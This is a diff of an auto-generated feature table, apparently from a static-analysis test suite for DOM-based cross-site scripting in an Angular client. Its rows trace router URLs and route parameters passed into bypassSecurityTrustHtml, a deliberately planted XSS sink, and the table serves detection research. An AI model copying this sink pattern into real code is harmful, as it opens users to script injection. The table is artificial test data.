route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:44:38:54 | this.router | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:44:38:54 | this.router | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:38:44:38:58 | this.router.url | CalleeFlexibleAccessPath | this.sanitizer.bypassSecurityTrustHtml | | autogenerated/Xss/DomBasedXss/angular2-client.ts:38:44:38:58 | this.router.url | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:38:44:38:58 | this.router.url | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -12062,6 +91800,61 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:38:44:38:58 | this.router.url | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | | autogenerated/Xss/DomBasedXss/angular2-client.ts:38:44:38:58 | this.router.url | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:38:44:38:58 | this.router.url | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:49:38:54 | router | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:49:38:54 | router | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:49:38:54 | router | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:49:38:54 | router | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:49:38:54 | router | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:56:38:58 | url | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:56:38:58 | url | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:56:38:58 | url | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:56:38:58 | url | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:38:56:38:58 | url | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:8 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:8 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:8 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:8 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:8 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:19 | this.sanitizer2 | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:19 | this.sanitizer2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:19 | this.sanitizer2 | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:19 | this.sanitizer2 | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:19 | this.sanitizer2 | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:43 | this.sa ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:43 | this.sa ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:43 | this.sa ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:43 | this.sa ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:43 | this.sa ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:60 | exceptional return of this.sa ... er.url) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:60 | exceptional return of this.sa ... er.url) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:60 | exceptional return of this.sa ... er.url) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:60 | exceptional return of this.sa ... er.url) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:60 | exceptional return of this.sa ... er.url) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:60 | this.sa ... er.url) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:60 | this.sa ... er.url) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:60 | this.sa ... er.url) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:60 | this.sa ... er.url) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:5:40:60 | this.sa ... er.url) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:10:40:19 | sanitizer2 | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:10:40:19 | sanitizer2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:10:40:19 | sanitizer2 | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:10:40:19 | sanitizer2 | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:10:40:19 | sanitizer2 | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:21:40:43 | bypassS ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:21:40:43 | bypassS ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:21:40:43 | bypassS ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:21:40:43 | bypassS ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:21:40:43 | bypassS ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:45:40:48 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:45:40:48 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:45:40:48 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:45:40:48 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:45:40:48 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:45:40:55 | this.router | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:45:40:55 | this.router | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:45:40:55 | this.router | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:45:40:55 | this.router | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:45:40:55 | this.router | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:40:45:40:59 | this.router.url | CalleeFlexibleAccessPath | this.sanitizer2.bypassSecurityTrustHtml | | autogenerated/Xss/DomBasedXss/angular2-client.ts:40:45:40:59 | this.router.url | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:40:45:40:59 | this.router.url | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -12069,6 +91862,114 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:40:45:40:59 | this.router.url | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | | autogenerated/Xss/DomBasedXss/angular2-client.ts:40:45:40:59 | this.router.url | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:40:45:40:59 | this.router.url | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:50:40:55 | router | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:50:40:55 | router | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:50:40:55 | router | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:50:40:55 | router | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:50:40:55 | router | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:57:40:59 | url | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:57:40:59 | url | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:57:40:59 | url | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:57:40:59 | url | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:40:57:40:59 | url | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:43:2 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:43:2 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:43:2 | this | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:43:2 | this | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:43:2 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:43:12 | someMethod | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:43:12 | someMethod | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:43:12 | someMethod | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | 'arguments' object of method someMethod of class AppComponent | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | 'arguments' object of method someMethod of class AppComponent | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | 'arguments' object of method someMethod of class AppComponent | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | 'arguments' object of method someMethod of class AppComponent | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | 'arguments' object of method someMethod of class AppComponent | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | exceptional return of method someMethod of class AppComponent | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | exceptional return of method someMethod of class AppComponent | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | exceptional return of method someMethod of class AppComponent | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | exceptional return of method someMethod of class AppComponent | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | exceptional return of method someMethod of class AppComponent | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | return of method someMethod of class AppComponent | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | return of method someMethod of class AppComponent | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | return of method someMethod of class AppComponent | enclosingFunctionBody | routeSnapshot ActivatedRouteSnapshot sanitizer bypassSecurityTrustHtml routeSnapshot paramMap get foo | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | return of method someMethod of class AppComponent | enclosingFunctionName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | return of method someMethod of class AppComponent | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | someMet ... OK\\n } | assignedToPropName | someMethod | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | someMet ... OK\\n } | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | someMet ... OK\\n } | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | someMet ... OK\\n } | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | someMet ... OK\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | someMet ... OK\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | someMet ... OK\\n } | contextSurroundingFunctionParameters | (routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | someMet ... OK\\n } | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | someMet ... OK\\n } | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:3:45:3 | someMet ... OK\\n } | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:14:43:26 | routeSnapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:14:43:26 | routeSnapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:14:43:26 | routeSnapshot | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:43:14:43:26 | routeSnapshot | contextSurroundingFunctionParameters | (routeSnapshot) | +| 